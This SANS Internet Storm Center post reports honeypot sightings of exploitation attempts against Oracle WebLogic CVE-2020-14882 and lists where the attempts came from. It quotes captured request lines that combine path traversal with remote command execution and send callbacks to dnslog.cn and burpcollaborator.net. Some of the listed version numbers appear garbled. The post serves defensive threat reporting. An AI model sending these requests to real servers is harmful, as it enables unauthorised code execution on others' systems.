Just about a week ago, as part of a massive quarterly “Criticial Patch Update” (aka “CPU”), Oracle patched CVE-2020-14882 in WebLogic. Oracle at the time assigned it a CVSS score of 9.8. We are now seeing active exploitation of the vulnerability against our honeypot after PoC exploits had been published.
Vulnerable WebLogic Versions:
10.3.6.0.0, 126.96.36.199.0, 188.8.131.52.0, 184.108.40.206.0 and 220.127.116.11.0
The exploitation of the vulnerability is trivial. For example, we are seeing these exploits being currently used:
[the honeypot’s IP has been replaced with AAA.BBB.CCC.DDD. Spaces added to allow for line breaks ]
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec(%27cmd /c
GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession( "java.lang.Runtime.getRuntime().exec( 'nslookup%20AAA.BBB.CCC.DDD.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net')
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec( %27ping%20AAA.BBB.CCC.DDD.uajiak.dnslog.cn%27);%22);
These exploit attempts are right now just verifying if the system is vulnerable. Our honeypots (up to now) do not return the “correct” response, and we have not seen follow-up requests yet.
Currently, exploit attempts originate from these 4 IP addresses:
First IP seen. Around noon UTC Oct 18th.
attempting to ping [some id].dnslog.cn
Address assigned to China Unicom
attempting to ping [victim ip].uajiak.dnslog.cn
Address assigned to Linode (USA)
At this point, most prolific scanner. attempting to execute "cmd /c" ?
The address is assigned to MivoCloud (Moldovia)
pinging [some ID].burpcollaborator.net
Address assigned to Datacamp Ltd (HongKong)
I am in the process of notifying the ISPs.
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.